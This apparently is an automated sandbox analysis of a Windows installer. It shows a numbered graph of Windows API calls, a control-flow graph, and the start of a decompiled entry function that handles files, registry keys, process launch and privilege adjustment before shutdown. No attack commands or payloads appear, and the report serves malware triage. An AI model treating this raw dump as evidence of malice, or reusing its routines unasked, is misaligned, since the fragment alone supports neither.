4065c8 3903->3906 3904->3903 3905 40659e CharNextA 3905->3903 3905->3909 3906->3883 3908 40658c CharNextA 3908->3909 3909->3903 3909->3905 3909->3908 3910 406599 CharNextA 3909->3910 3923 405c14 3909->3923 3910->3905 3919 4060dd 3911->3919 3914 406172 RegQueryValueExA RegCloseKey 3915 4061a1 3914->3915 3915->3889 3916->3889 3917->3889 3918->3887 3920 4060ec 3919->3920 3921 4060f5 RegOpenKeyExA 3920->3921 3922 4060f0 3920->3922 3921->3922 3922->3914 3922->3915 3924 405c1a 3923->3924 3925 405c2d 3924->3925 3926 405c20 CharNextA 3924->3926 3925->3909 3926->3924 3938 4020a5 3939 4020b7 3938->3939 3949 402165 3938->3949 3940 402c39 17 API calls 3939->3940 3941 4020be 3940->3941 3943 402c39 17 API calls 3941->3943 3942 401423 24 API calls 3945 4022ea 3942->3945 3944 4020c7 3943->3944 3946 4020dc LoadLibraryExA 3944->3946 3947 4020cf GetModuleHandleA 3944->3947 3948 4020ec GetProcAddress 3946->3948 3946->3949 3947->3946 3947->3948 3950 402138 3948->3950 3951 4020fb 3948->3951 3949->3942 3959 405378 3950->3959 3954 40210b 3951->3954 3956 401423 3951->3956 3954->3945 3955 402159 FreeLibrary 3954->3955 3955->3945 3957 405378 24 API calls 3956->3957 3958 401431 3957->3958 3958->3954 3960 405436 3959->3960 3961 405393 3959->3961 3960->3954 3962 4053b0 lstrlenA 3961->3962 3963 4062ea 17 API calls 3961->3963 3964 4053d9 3962->3964 3965 4053be lstrlenA 3962->3965 3963->3962 3967 4053ec 3964->3967 3968 4053df SetWindowTextA 3964->3968 3965->3960 3966 4053d0 lstrcatA 3965->3966 3966->3964 3967->3960 3969 4053f2 SendMessageA SendMessageA SendMessageA 3967->3969 3968->3967 3969->3960 5498 402e25 5499 402e34 SetTimer 5498->5499 5500 402e4d 5498->5500 5499->5500 5501 402ea2 5500->5501 5502 402e67 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5500->5502 5502->5501 5503 73c32b24 5504 73c32b76 5503->5504 5505 73c32b80 GetLastError 5504->5505 5506 73c32b8b 5504->5506 5505->5506 5507 73c31a24 5508 73c31504 GlobalFree 5507->5508 5509 73c31a3c 5508->5509 5510 73c31a7e GlobalFree 5509->5510 5511 73c31a5a 5509->5511 5512 73c31a6a VirtualFree 5509->5512 5511->5510 5512->5510 5513 73c31c2b 5514 73c31c52 5513->5514 5515 73c31cad __alldvrm 5514->5515 5516 73c31c8f GlobalFree 5514->5516 5517 73c3157e 2 API calls 5515->5517 5516->5515 5518 73c31d41 GlobalFree GlobalFree 5517->5518 4007 402429 4008 402430 4007->4008 4009 40245b 4007->4009 4023 402c79 4008->4023 4011 402c39 17 API calls 4009->4011 4013 402462 4011->4013 4019 402cf7 4013->4019 4014 402441 4016 402c39 17 API calls 4014->4016 4018 402448 RegDeleteValueA RegCloseKey 4016->4018 4017 40246f 4018->4017 4020 402d03 4019->4020 4021 402d0a 4019->4021 4020->4017 4021->4020 4028 402d3b 4021->4028 4024 402c39 17 API calls 4023->4024 4025 402c90 4024->4025 4026 4060dd RegOpenKeyExA 4025->4026 4027 402437 4026->4027 4027->4014 4027->4017 4029 4060dd RegOpenKeyExA 4028->4029 4030 402d69 4029->4030 4031 402d73 4030->4031 4032 402e1e 4030->4032 4033 402d79 RegEnumValueA 4031->4033 4034 402d9c 4031->4034 4032->4020 4033->4034 4036 402e03 RegCloseKey 4033->4036 4035 402dd8 RegEnumKeyA 4034->4035 4034->4036 4037 402de1 RegCloseKey 4034->4037 4039 402d3b 6 API calls 4034->4039 4035->4034 4035->4037 4036->4032 4043 406663 GetModuleHandleA 4037->4043 4039->4034 4041 402e13 4041->4032 4042 402df5 RegDeleteKeyA 4042->4032 4044 406689 GetProcAddress 4043->4044 4045 40667f 4043->4045 4047 402df1 4044->4047 4049 4065f5 GetSystemDirectoryA 4045->4049 4047->4041 4047->4042 4048 406685 4048->4044 4048->4047 4050 406617 wsprintfA LoadLibraryExA 4049->4050 4050->4048 5519 4027aa 5520 402c39 17 API calls 5519->5520 5521 4027b1 FindFirstFileA 5520->5521 5522 4027d4 5521->5522 5526 4027c4 5521->5526 5523 4027db 5522->5523 5527 4061b5 wsprintfA 5522->5527 5528 406257 lstrcpynA 5523->5528 5527->5523 5528->5526 5529 401c2e 5530 402c17 17 API calls 5529->5530 5531 401c35 5530->5531 5532 402c17 17 API calls 5531->5532 5533 401c42 5532->5533 5534 401c57 5533->5534 5535 402c39 17 API calls 5533->5535 5536 401c67 5534->5536 5537 402c39 17 API calls 5534->5537 5535->5534 5538 401c72 5536->5538 5539 401cbe 5536->5539 5537->5536 5541 402c17 17 API calls 5538->5541 5540 402c39 17 API calls 5539->5540 5543 401cc3 5540->5543 5542 401c77 5541->5542 5544 402c17 17 API calls 5542->5544 5545 402c39 17 API calls 5543->5545 5546 401c83 5544->5546 5547 401ccc FindWindowExA 5545->5547 5548 401c90 SendMessageTimeoutA 5546->5548 5549 401cae SendMessageA 5546->5549 5550 401cea 5547->5550 5548->5550 5549->5550 5551 40262e 5552 402633 5551->5552 5553 402647 5551->5553 5554 402c17 17 API calls 5552->5554 5555 402c39 17 API calls 5553->5555 5557 40263c 5554->5557 5556 40264e lstrlenA 5555->5556 5556->5557 5558 405e91 WriteFile 5557->5558 5559 402670 5557->5559 5558->5559 4090 401932 4091 401934 4090->4091 4092 402c39 17 API calls 4091->4092 4093 401939 4092->4093 4096 405a19 4093->4096 4137 405cd7 4096->4137 4099 405a41 DeleteFileA 4104 401942 4099->4104 4100 405a58 4102 405b90 4100->4102 4151 406257 lstrcpynA 4100->4151 4102->4104 4169 4065ce FindFirstFileA 4102->4169 4103 405a7e 4105 405a91 4103->4105 4106 405a84 lstrcatA 4103->4106 4152 405c30 lstrlenA 4105->4152 4108 405a97 4106->4108 4111 405aa5 lstrcatA 4108->4111 4112 405a9c 4108->4112 4114 405ab0 lstrlenA FindFirstFileA 4111->4114 4112->4111 4112->4114 4113 405bae 4172 405be9 lstrlenA CharPrevA 4113->4172 4115 405b86 4114->4115 4135 405ad4 4114->4135 4115->4102 4117 405c14 CharNextA 4117->4135 4119 4059d1 5 API calls 4120 405bc0 4119->4120 4121 405bc4 4120->4121 4122 405bda 4120->4122 4121->4104 4127 405378 24 API calls 4121->4127 4123 405378 24 API calls 4122->4123 4123->4104 4124 405b65 FindNextFileA 4126 405b7d FindClose 4124->4126 4124->4135 4126->4115 4128 405bd1 4127->4128 4130 406030 36 API calls 4128->4130 4131 405bd8 4130->4131 4131->4104 4132 405a19 60 API calls 4132->4135 4133 405378 24 API calls 4133->4124 4134 405378 24 API calls 4134->4135 4135->4117 4135->4124 4135->4132 4135->4133 4135->4134 4156 406257 lstrcpynA 4135->4156 4157 4059d1 4135->4157 4165 406030 MoveFileExA 4135->4165 4175 406257 lstrcpynA 4137->4175 4139 405ce8 4176 405c82 CharNextA CharNextA 4139->4176 4142 405a39 4142->4099 4142->4100 4143 406535 5 API calls 4149 405cfe 4143->4149 4144 405d29 lstrlenA 4145 405d34 4144->4145 4144->4149 4147 405be9 3 API calls 4145->4147 4146 4065ce 2 API calls 4146->4149 4148 405d39 GetFileAttributesA 4147->4148 4148->4142 4149->4142 4149->4144 4149->4146 4150 405c30 2 API calls 4149->4150 4150->4144 4151->4103 4153 405c3d 4152->4153 4154 405c42 CharPrevA 4153->4154 4155 405c4e 4153->4155 4154->4153 4154->4155 4155->4108 4156->4135 4182 405dc5 GetFileAttributesA 4157->4182 4160 4059f4 DeleteFileA 4162 4059fa 4160->4162 4161 4059ec RemoveDirectoryA 4161->4162 4163 4059fe 4162->4163 4164 405a0a SetFileAttributesA 4162->4164 4163->4135 4164->4163 4166 406051 4165->4166 4167 406044 4165->4167 4166->4135 4185 405ec0 4167->4185 4170 4065e4 FindClose 4169->4170 4171 405baa 4169->4171 4170->4171 4171->4104 4171->4113 4173 405c03 lstrcatA 4172->4173 4174 405bb4 4172->4174 4173->4174 4174->4119 4175->4139 4178 405c9d 4176->4178 4181 405cad 4176->4181 4177 405ccd 4177->4142 4177->4143 4179 405ca8 CharNextA 4178->4179 4178->4181 4179->4177 4180 405c14 CharNextA 4180->4181 4181->4177 4181->4180 4183 4059dd 4182->4183 4184 405dd7 SetFileAttributesA 4182->4184 4183->4160 4183->4161 4183->4163 4184->4183 4186 405ee6 4185->4186 4187 405f0c GetShortPathNameA 4185->4187 4212 405dea GetFileAttributesA CreateFileA 4186->4212 4188 405f21 4187->4188 4189 40602b 4187->4189 4188->4189 4191 405f29 wsprintfA 4188->4191 4189->4166 4193 4062ea 17 API calls 4191->4193 4192 405ef0 CloseHandle GetShortPathNameA 4192->4189 4194 405f04 4192->4194 4195 405f51 4193->4195 4194->4187 4194->4189 4213 405dea GetFileAttributesA CreateFileA 4195->4213 4197 405f5e 4197->4189 4198 405f6d GetFileSize GlobalAlloc 4197->4198 4199 406024 CloseHandle 4198->4199 4200 405f8f 4198->4200 4199->4189 4214 405e62 ReadFile 4200->4214 4205 405fc2 4207 405d4f 4 API calls 4205->4207 4206 405fae lstrcpyA 4208 405fd0 4206->4208 4207->4208 4209 406007 SetFilePointer 4208->4209 4221 405e91 WriteFile 4209->4221 4212->4192 4213->4197 4215 405e80 4214->4215 4215->4199 4216 405d4f lstrlenA 4215->4216 4217 405d90 lstrlenA 4216->4217 4218 405d98 4217->4218 4219 405d69 lstrcmpiA 4217->4219 4218->4205 4218->4206 4219->4218 4220 405d87 CharNextA 4219->4220 4220->4217 4222 405eaf GlobalFree 4221->4222 4222->4199 4223 4033b3 SetErrorMode GetVersionExA 4224 403405 GetVersionExA 4223->4224 4226 403444 4223->4226 4225 403421 4224->4225 4224->4226 4225->4226 4227 4034c8 4226->4227 4228 406663 5 API calls 4226->4228 4229 4065f5 3 API calls 4227->4229 4228->4227 4230 4034de lstrlenA 4229->4230 4230->4227 4231 4034ee 4230->4231 4232 406663 5 API calls 4231->4232 4233 4034f5 4232->4233 4234 406663 5 API calls 4233->4234 4235 4034fc 4234->4235 4236 406663 5 API calls 4235->4236 4237 403508 #17 OleInitialize SHGetFileInfoA 4236->4237 4315 406257 lstrcpynA 4237->4315 4240 403556 GetCommandLineA 4316 406257 lstrcpynA 4240->4316 4242 403568 4243 405c14 CharNextA 4242->4243 4244 40358f CharNextA 4243->4244 4252 40359e 4244->4252 4245 403664 4246 403678 GetTempPathA 4245->4246 4317 403382 4246->4317 4248 403690 4249 403694 GetWindowsDirectoryA lstrcatA 4248->4249 4250 4036ea DeleteFileA 4248->4250 4253 403382 12 API calls 4249->4253 4327 402f0c GetTickCount GetModuleFileNameA 4250->4327 4251 405c14 CharNextA 4251->4252 4252->4245 4252->4251 4256 403666 4252->4256 4255 4036b0 4253->4255 4255->4250 4259 4036b4 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4255->4259 4411 406257 lstrcpynA 4256->4411 4257 4036fd 4263 405c14 CharNextA 4257->4263 4299 403782 4257->4299 4310 403792 4257->4310 4261 403382 12 API calls 4259->4261 4265 4036e2 4261->4265 4266 403717 4263->4266 4265->4250 4265->4310 4273 4037c1 4266->4273 4274 40375c 4266->4274 4267 4037ac 4269 40596d MessageBoxIndirectA 4267->4269 4268 4038cf 4270 4038d7 GetCurrentProcess OpenProcessToken 4268->4270 4271 40394d ExitProcess 4268->4271 4275 4037b9 ExitProcess 4269->4275 4276 40391d 4270->4276 4277 4038ee LookupPrivilegeValueA AdjustTokenPrivileges 4270->4277 4421 4058d8 4273->4421 4278 405cd7 18 API calls 4274->4278 4280 406663 5 API calls 4276->4280 4277->4276 4281 403768 4278->4281 4283 403924 4280->4283 4281->4310 4412 406257 lstrcpynA 4281->4412 4286 403939 ExitWindowsEx 4283->4286 4287 403946 4283->4287 4284 4037e2 lstrcatA lstrcmpiA 4289 4037fe 4284->4289 4284->4310 4285 4037d7 lstrcatA 4285->4284 4286->4271 4286->4287 4437 40140b 4287->4437 4292 403803 4289->4292 4293 40380a 4289->4293 4291 403777 4413 406257 lstrcpynA 4291->4413 4424 40583e CreateDirectoryA 4292->4424 4429 4058bb CreateDirectoryA 4293->4429 4298 40380f SetCurrentDirectoryA 4300 40382a 4298->4300 4301 40381f 4298->4301 4355 403a3d 4299->4355 4433 406257 lstrcpynA 4300->4433 4432 406257 lstrcpynA 4301->4432 4304 4062ea 17 API calls 4305 40386c DeleteFileA 4304->4305 4306 40387a CopyFileA 4305->4306 4312 403837 4305->4312 4306->4312 4307 4038c3 4308 406030 36 API calls 4307->4308 4308->4310 4309 406030 36 API calls 4309->4312 4414 403963 4310->4414 4311 4062ea 17 API calls 4311->4312 4312->4304 4312->4307 4312->4309 4312->4311 4314 4038ae CloseHandle 4312->4314 4434 4058f0 CreateProcessA 4312->4434 4314->4312 4315->4240 4316->4242 4318 406535 5 API calls 4317->4318 4319 40338e 4318->4319 4320 403398 4319->4320 4321 405be9 3 API calls 4319->4321 4320->4248 4322 4033a0 4321->4322 4323 4058bb 2 API calls 4322->4323 4324 4033a6 4323->4324 4325 405e19 2 API calls 4324->4325 4326 4033b1 4325->4326 4326->4248 4440 405dea GetFileAttributesA CreateFileA 4327->4440 4329 402f4c 4350 402f5c 4329->4350 4441 406257 lstrcpynA 4329->4441 4331 402f72 4332 405c30 2 API calls 4331->4332 4333 402f78 4332->4333 4442 406257 lstrcpynA 4333->4442 4335 402f83 GetFileSize 4336 40307d 4335->4336 4348 402f9a 4335->4348 4443 402ea8 4336->4443 4338 403086 4340 4030b6 GlobalAlloc 4338->4340 4338->4350 4478 40336b SetFilePointer 4338->4478 4454 40336b SetFilePointer 4340->4454 4342 4030e9 4346 402ea8 6 API calls 4342->4346 4344 40309f 4347 403355 ReadFile 4344->4347 4345 4030d1 4455 403143 4345->4455 4346->4350 4351 4030aa 4347->4351 4348->4336 4348->4342 4348->4350 4352 402ea8 6 API calls 4348->4352 4475 403355 4348->4475 4350->4257 4351->4340 4351->4350 4352->4348 4353 4030dd 4353->4350 4353->4353 4354 40311a SetFilePointer 4353->4354 4354->4350 4356 406663 5 API calls 4355->4356 4357 403a51 4356->4357 4358 403a57 4357->4358 4359 403a69 4357->4359 4499 4061b5 wsprintfA 4358->4499 4360 40613e 3 API calls 4359->4360 4361 403a94 4360->4361 4363 403ab2 lstrcatA 4361->4363 4365 40613e 3 API calls 4361->4365 4364 403a67 4363->4364 4484 403d02 4364->4484 4365->4363 4368 405cd7 18 API calls 4369 403ae4 4368->4369 4370 403b6d 4369->4370 4372 40613e 3 API calls 4369->4372 4371 405cd7 18 API calls 4370->4371 4373 403b73 4371->4373 4374 403b10 4372->4374 4375 403b83 LoadImageA 4373->4375 4376 4062ea 17 API calls 4373->4376 4374->4370 4379 403b2c lstrlenA 4374->4379 4382 405c14 CharNextA 4374->4382 4377 403c29 4375->4377 4378 403baa RegisterClassA 4375->4378 4376->4375 4381 40140b 2 API calls 4377->4381 4380 403be0 SystemParametersInfoA CreateWindowExA 4378->4380 4410 403c33 4378->4410 4383 403b60 4379->4383 4384 403b3a lstrcmpiA 4379->4384 4380->4377 4385 403c2f 4381->4385 4387 403b2a 4382->4387 4386 405be9 3 API calls 4383->4386 4384->4383 4388 403b4a GetFileAttributesA 4384->4388 4389 403d02 18 API calls 4385->4389 4385->4410 4390 403b66 4386->4390 4387->4379 4391 403b56 4388->4391 4392 403c40 4389->4392 4500 406257 lstrcpynA 4390->4500 4391->4383 4394 405c30 2 API calls 4391->4394 4395 403c4c ShowWindow 4392->4395 4396 403ccf 4392->4396 4394->4383 4398 4065f5 3 API calls 4395->4398 4492 40544a OleInitialize 4396->4492 4400 403c64 4398->4400 4399 403cd5 4401 403cf1 4399->4401 4402 403cd9 4399->4402 4403 403c72 GetClassInfoA 4400->4403 4405 4065f5 3 API calls 4400->4405 4404 40140b 2 API calls 4401->4404 4408 40140b 2 API calls 4402->4408 4402->4410 4406 403c86 GetClassInfoA RegisterClassA 4403->4406 4407 403c9c DialogBoxParamA 4403->4407 4404->4410 4405->4403 4406->4407 4409 40140b 2 API calls 4407->4409 4408->4410 4409->4410 4410->4310 4411->4246 4412->4291 4413->4299 4415 40397b 4414->4415 4416 40396d CloseHandle 4414->4416 4512 4039a8 4415->4512 4416->4415 4419 405a19 67 API calls 4420 40379a OleUninitialize 4419->4420 4420->4267 4420->4268 4422 406663 5 API calls 4421->4422 4423 4037c6 lstrcatA 4422->4423 4423->4284 4423->4285 4425 403808 4424->4425 4426 40588f GetLastError 4424->4426 4425->4298 4426->4425 4427 40589e SetFileSecurityA 4426->4427 4427->4425 4428 4058b4 GetLastError 4427->4428 4428->4425 4430 4058cb 4429->4430 4431 4058cf GetLastError 4429->4431 4430->4298 4431->4430 4432->4300 4433->4312 4435 405923 CloseHandle 4434->4435 4436 40592f 4434->4436 4435->4436 4436->4312 4438 401389 2 API calls 4437->4438 4439 401420 4438->4439 4439->4271 4440->4329 4441->4331 4442->4335 4444 402eb1 4443->4444 4445 402ec9 4443->4445 4446 402ec1 4444->4446 4447 402eba DestroyWindow 4444->4447 4448 402ed1 4445->4448 4449 402ed9 GetTickCount 4445->4449 4446->4338 4447->4446 4479 40669f 4448->4479 4451 402ee7 CreateDialogParamA ShowWindow 4449->4451 4452 402f0a 4449->4452 4451->4452 4452->4338 4454->4345 4456 403159 4455->4456 4457 403187 4456->4457 4483 40336b SetFilePointer 4456->4483 4459 403355 ReadFile 4457->4459 4460 403192 4459->4460 4461 4032d8 4460->4461 4462 4031a4 GetTickCount 4460->4462 4463 4032ee 4460->4463 4461->4353 4462->4461 4468 4031f3 4462->4468 4464 403330 4463->4464 4467 4032f2 4463->4467 4465 403355 ReadFile 4464->4465 4465->4461 4466 403355 ReadFile 4466->4468 4467->4461 4469 403355 ReadFile 4467->4469 4470 405e91 WriteFile 4467->4470 4468->4461 4468->4466 4471 403249 GetTickCount 4468->4471 4472 40326e MulDiv wsprintfA 4468->4472 4474 405e91 WriteFile 4468->4474 4469->4467 4470->4467 4471->4468 4473 405378 24 API calls 4472->4473 4473->4468 4474->4468 4476 405e62 ReadFile 4475->4476 4477 403368 4476->4477 4477->4348 4478->4344 4480 4066bc PeekMessageA 4479->4480 4481 4066b2 DispatchMessageA 4480->4481 4482 402ed7 4480->4482 4481->4480 4482->4338 4483->4457 4485 403d16 4484->4485 4501 4061b5 wsprintfA 4485->4501 4487 403d87 4502 403dbb 4487->4502 4489 403ac2 4489->4368 4490 403d8c 4490->4489 4491 4062ea 17 API calls 4490->4491 4491->4490 4505 404320 4492->4505 4494 404320 SendMessageA 4496 4054a6 OleUninitialize 4494->4496 4495 40546d 4498 405494 4495->4498 4508 401389 4495->4508 4496->4399 4498->4494 4499->4364 4500->4370 4501->4487 4503 4062ea 17 API calls 4502->4503 4504 403dc9 SetWindowTextA 4503->4504 4504->4490 4506 404338 4505->4506 4507 404329 SendMessageA 4505->4507 4506->4495 4507->4506 4510 401390 4508->4510 4509 4013fe 4509->4495 4510->4509 4511 4013cb MulDiv SendMessageA 4510->4511 4511->4510 4513 4039b6 4512->4513 4514 403980 4513->4514 4515 4039bb FreeLibrary GlobalFree 4513->4515 4514->4419 4515->4514 4515->4515 5560 402733 5561 40273a 5560->5561 5564 402a47 5560->5564 5562 402c17 17 API calls 5561->5562 5563 402741 5562->5563 5565 402750 SetFilePointer 5563->5565 5565->5564 5566 402760 5565->5566 5568 4061b5 wsprintfA 5566->5568 5568->5564 5569 401e35 GetDC 5570 402c17 17 API calls 5569->5570 5571 401e47 GetDeviceCaps MulDiv ReleaseDC 5570->5571 5572 402c17 17 API calls 5571->5572 5573 401e78 5572->5573 5574 4062ea 17 API calls 5573->5574 5575 401eb5 CreateFontIndirectA 5574->5575 5576 402628 5575->5576 4521 4054b6 4522 405661 4521->4522 4523 4054d8 GetDlgItem GetDlgItem GetDlgItem 4521->4523 4525 405691 4522->4525 4526 405669 GetDlgItem CreateThread CloseHandle 4522->4526 4567 404309 SendMessageA 4523->4567 4528 4056bf 4525->4528 4529 4056e0 4525->4529 4530 4056a7 ShowWindow ShowWindow 4525->4530 4526->4525 4590 40544a 5 API calls 4526->4590 4527 405548 4533 40554f GetClientRect GetSystemMetrics SendMessageA SendMessageA 4527->4533 4531 4056c7 4528->4531 4532 40571a 4528->4532 4576 40433b 4529->4576 4572 404309 SendMessageA 4530->4572 4535 4056f3 ShowWindow 4531->4535 4536 4056cf 4531->4536 4532->4529 4542 405727 SendMessageA 4532->4542 4540 4055a1 SendMessageA SendMessageA 4533->4540 4541 4055bd 4533->4541 4538 405713 4535->4538 4539 405705 4535->4539 4573 4042ad 4536->4573 4546 4042ad SendMessageA 4538->4546 4545 405378 24 API calls 4539->4545 4540->4541 4547 4055d0 4541->4547 4548 4055c2 SendMessageA 4541->4548 4544 4056ec 4542->4544 4549 405740 CreatePopupMenu 4542->4549 4545->4538 4546->4532 4568 4042d4 4547->4568 4548->4547 4550 4062ea 17 API calls 4549->4550 4552 405750 AppendMenuA 4550->4552 4554 405781 TrackPopupMenu 4552->4554 4555 40576e GetWindowRect 4552->4555 4553 4055e0 4556 4055e9 ShowWindow 4553->4556 4557 40561d GetDlgItem SendMessageA 4553->4557 4554->4544 4559 40579d 4554->4559 4555->4554 4560 40560c 4556->4560 4561 4055ff ShowWindow 4556->4561 4557->4544 4558 405644 SendMessageA SendMessageA 4557->4558 4558->4544 4562 4057bc SendMessageA 4559->4562 4571 404309 SendMessageA 4560->4571 4561->4560 4562->4562 4563 4057d9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4562->4563 4565 4057fb SendMessageA 4563->4565 4565->4565 4566 40581d GlobalUnlock SetClipboardData CloseClipboard 4565->4566 4566->4544 4567->4527 4569 4062ea 17 API calls 4568->4569 4570 4042df SetDlgItemTextA 4569->4570 4570->4553 4571->4557 4572->4528 4574 4042b4 4573->4574 4575 4042ba SendMessageA 4573->4575 4574->4575 4575->4529 4577 4043fe 4576->4577 4578 404353 GetWindowLongA 4576->4578 4577->4544 4578->4577 4579 404368 4578->4579 4579->4577 4580 404395 GetSysColor 4579->4580 4581 404398 4579->4581 4580->4581 4582 4043a8 SetBkMode 4581->4582 4583 40439e SetTextColor 4581->4583 4584 4043c0 GetSysColor 4582->4584 4585 4043c6 4582->4585 4583->4582 4584->4585 4586 4043d7 4585->4586 4587 4043cd SetBkColor 4585->4587 4586->4577 4588 4043f1 CreateBrushIndirect 4586->4588 4589 4043ea DeleteObject 4586->4589 4587->4586 4588->4577 4589->4588 5577 404ab7 5578 404ae3 5577->5578 5579 404ac7 5577->5579 5581 404b16 5578->5581 5582 404ae9 SHGetPathFromIDListA 5578->5582 5588 405951 GetDlgItemTextA 5579->5588 5584 404b00 SendMessageA 5582->5584 5585 404af9 5582->5585 5583 404ad4 SendMessageA 5583->5578 5584->5581 5586 40140b 2 API calls 5585->5586 5586->5584 5588->5583 5589 4014b7 5590 4014bd 5589->5590 5591 401389 2 API calls 5590->5591 5592 4014c5 5591->5592 5593 73c3103a 5594 73c31052 5593->5594 5595 73c310c4 5594->5595 5596 73c31080 5594->5596 5597 73c31060 5594->5597 5599 73c31504 GlobalFree 5596->5599 5598 73c31504 GlobalFree 5597->5598 5600 73c31071 5598->5600 5604 73c31078 5599->5604 5601 73c31504 GlobalFree 5600->5601 5601->5604 5602 73c31090 GlobalSize 5603 73c31099 5602->5603 5605 73c310ae 5603->5605 5606 73c3109d GlobalAlloc 5603->5606 5604->5602 5604->5603 5608 73c310b7 GlobalFree 5605->5608 5607 73c31558 3 API calls 5606->5607 5607->5605 5608->5595 4709 4015bb 4710 402c39 17 API calls 4709->4710 4711 4015c2 4710->4711 4712 405c82 4 API calls 4711->4712 4725 4015ca 4712->4725 4713 401624 4715 401652 4713->4715 4716 401629 4713->4716 4714 405c14 CharNextA 4714->4725 4718 401423 24 API calls 4715->4718 4717 401423 24 API calls 4716->4717 4719 401630 4717->4719 4722 40164a 4718->4722 4728 406257 lstrcpynA 4719->4728 4721 4058bb 2 API calls 4721->4725 4723 4058d8 5 API calls 4723->4725 4724 40163b SetCurrentDirectoryA 4724->4722 4725->4713 4725->4714 4725->4721 4725->4723 4726 40160c GetFileAttributesA 4725->4726 4727 40583e 4 API calls 4725->4727 4726->4725 4727->4725 4728->4724 5609 4016bb 5610 402c39 17 API calls 5609->5610 5611 4016c1 GetFullPathNameA 5610->5611 5613 4016d8 5611->5613 5618 4016f9 5611->5618 5612 40170d GetShortPathNameA 5614 402ac5 5612->5614 5615 4065ce 2 API calls 5613->5615 5613->5618 5616 4016e9 5615->5616 5616->5618 5619 406257 lstrcpynA 5616->5619 5618->5612 5618->5614 5619->5618 5620 40443f 5621 404455 5620->5621 5626 404561 5620->5626 5624 4042d4 18 API calls 5621->5624 5622 4045d0 5623 40469a 5622->5623 5625 4045da GetDlgItem 5622->5625 5631 40433b 8 API calls 5623->5631 5627 4044ab 5624->5627 5628 4045f0 5625->5628 5632 404658 5625->5632 5626->5622 5626->5623 5629 4045a5 GetDlgItem SendMessageA 5626->5629 5630 4042d4 18 API calls 5627->5630 5628->5632 5637 404616 SendMessageA LoadCursorA SetCursor 5628->5637 5653 4042f6 KiUserCallbackDispatcher 5629->5653 5635 4044b8 CheckDlgButton 5630->5635 5636 404695 5631->5636 5632->5623 5633 40466a 5632->5633 5638 404670 SendMessageA 5633->5638 5639 404681 5633->5639 5651 4042f6 KiUserCallbackDispatcher 5635->5651 5654 4046e3 5637->5654 5638->5639 5639->5636 5643 404687 SendMessageA 5639->5643 5640 4045cb 5644 4046bf SendMessageA 5640->5644 5643->5636 5644->5622 5645 4044d6 GetDlgItem 5652 404309 SendMessageA 5645->5652 5648 4044ec SendMessageA 5649 404513 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5648->5649 5650 40450a GetSysColor 5648->5650 5649->5636 5650->5649 5651->5645 5652->5648 5653->5640 5657 405933 ShellExecuteExA 5654->5657 5656 404649 LoadCursorA SetCursor 5656->5632 5657->5656

                                                            Executed Functions

                                                            Function 004033B3 Relevance: 84.4, APIs: 33, Strings: 15, Instructions: 417stringfilecomCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 4033b3-403403 SetErrorMode GetVersionExA 1 403444 0->1 2 403405-40341f GetVersionExA 0->2 4 40344b 1->4 3 403421-403440 2->3 2->4 3->1 5 40344d-403458 4->5 6 40346f-403476 4->6 7 40345a-403469 5->7 8 40346b 5->8 9 403480-4034c0 6->9 10 403478 6->10 7->6 8->6 11 4034c2-4034ca call 406663 9->11 12 4034d3 9->12 10->9 11->12 17 4034cc 11->17 14 4034d8-4034ec call 4065f5 lstrlenA 12->14 19 4034ee-40350a call 406663 * 3 14->19 17->12 26 40351b-40357b #17 OleInitialize SHGetFileInfoA call 406257 GetCommandLineA call 406257 19->26 27 40350c-403512 19->27 34 403586-403599 call 405c14 CharNextA 26->34 35 40357d-403581 26->35 27->26 31 403514 27->31 31->26 38 40365a-40365e 34->38 35->34 39 403664 38->39 40 40359e-4035a1 38->40 41 403678-403692 GetTempPathA call 403382 39->41 42 4035a3-4035a7 40->42 43 4035a9-4035b0 40->43 52 403694-4036b2 GetWindowsDirectoryA lstrcatA call 403382 41->52 53 4036ea-403702 DeleteFileA call 402f0c 41->53 42->42 42->43 44 4035b2-4035b3 43->44 45 4035b7-4035ba 43->45 44->45 47 4035c0-4035c4 45->47 48 40364b-403657 call 405c14 45->48 50 4035c6-4035cc 47->50 51 4035dc-403609 47->51 48->38 67 403659 48->67 55 4035d2 50->55 56 4035ce-4035d0 50->56 57 40361b-403649 51->57 58 40360b-403611 51->58 52->53 69 4036b4-4036e4 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403382 52->69 70 403795-4037a6 call 403963 OleUninitialize 53->70 71 403708-40370e 53->71 55->51 56->51 56->55 57->48 65 403666-403673 call 406257 57->65 62 403613-403615 58->62 63 403617 58->63 62->57 62->63 63->57 65->41 67->38 69->53 69->70 82 4037ac-4037bb call 40596d ExitProcess 70->82 83 4038cf-4038d5 70->83 72 403710-40371b call 405c14 71->72 73 403786-40378d call 403a3d 71->73 84 403751-40375a 72->84 85 40371d-403746 72->85 80 403792 73->80 80->70 87 4038d7-4038ec GetCurrentProcess OpenProcessToken 83->87 88 40394d-403955 83->88 92 4037c1-4037d5 call 4058d8 lstrcatA 84->92 93 40375c-40376a call 405cd7 84->93 89 403748-40374a 85->89 95 40391d-40392b call 406663 87->95 96 4038ee-403917 LookupPrivilegeValueA AdjustTokenPrivileges 87->96 90 403957 88->90 91 40395a-40395d ExitProcess 88->91 89->84 97 40374c-40374f 89->97 90->91 105 4037e2-4037fc lstrcatA lstrcmpiA 92->105 106 4037d7-4037dd lstrcatA 92->106 93->70 104 40376c-403782 call 406257 * 2 93->104 107 403939-403944 ExitWindowsEx 95->107 108 40392d-403937 95->108 96->95 97->84 97->89 104->73 105->70 111 4037fe-403801 105->111 106->105 107->88 109 403946-403948 call 40140b 107->109 108->107 108->109 109->88 115 403803-403808 call 40583e 111->115 116 40380a call 4058bb 111->116 121 40380f-40381d SetCurrentDirectoryA 115->121 116->121 123 40382a-403855 call 406257 121->123 124 40381f-403825 call 406257 121->124 128 40385b-403878 call 4062ea DeleteFileA 123->128 124->123 131 4038b8-4038c1 128->131 132 40387a-40388a CopyFileA 128->132 131->128 133 4038c3-4038ca call 406030 131->133 132->131 134 40388c-4038ac call 406030 call 4062ea call 4058f0 132->134 133->70 134->131 143 4038ae-4038b5 CloseHandle 134->143 143->131
                                                            C-Code - Quality: 85%
                                                            			_entry_() {
				CHAR* _v8;
				long _v12;
				char _v16;
				long _v20;
				void* _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
